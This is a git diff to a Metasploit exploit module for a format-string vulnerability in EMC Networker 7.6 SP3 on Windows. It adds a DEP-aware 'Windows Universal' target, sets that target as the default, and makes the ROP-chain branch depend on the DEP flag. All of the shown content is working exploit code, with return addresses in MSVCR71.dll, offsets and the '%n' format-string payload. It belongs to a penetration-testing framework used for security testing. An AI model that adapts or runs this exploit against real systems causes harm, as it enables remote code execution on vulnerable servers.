diff --git a/modules/exploits/windows/emc/networker_format_string.rb b/modules/exploits/windows/emc/networker_format_string.rb index a817c6ac5a..281dc97a77 100644 --- a/modules/exploits/windows/emc/networker_format_string.rb +++ b/modules/exploits/windows/emc/networker_format_string.rb @@ -45,20 +45,29 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Targets' => [ + ['EMC Networker 7.6 SP3 / Windows Universal', + { + 'Ret' => 0x7c354dac, # ret from MSVCR71.dll + 'Offset' => 156, + 'DEP' => true + } + ], ['EMC Networker 7.6 SP3 / Windows XP SP3', { 'Ret' => 0x7c345c30, # push esp # ret from MSVCR71.dll - 'Offset' => 156 + 'Offset' => 156, + 'DEP' => false } ], ['EMC Networker 7.6 SP3 / Windows 2003 SP2', { 'Ret' => 0x7c354dac, # ret from MSVCR71.dll - 'Offset' => 156 + 'Offset' => 156, + 'DEP' => true } ] ], - 'DefaultTarget' => 1, + 'DefaultTarget' => 0, 'Privileged' => true, 'DisclosureDate' => 'Aug 29 2012')) @@ -73,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote fs = "%n" * target['Offset'] fs << [target.ret].pack("V") # push esp # ret from MSVCR71.dll - if target.name =~ /Windows 2003/ + if target['DEP'] rop_gadgets = [ # rop chain generated with mona.py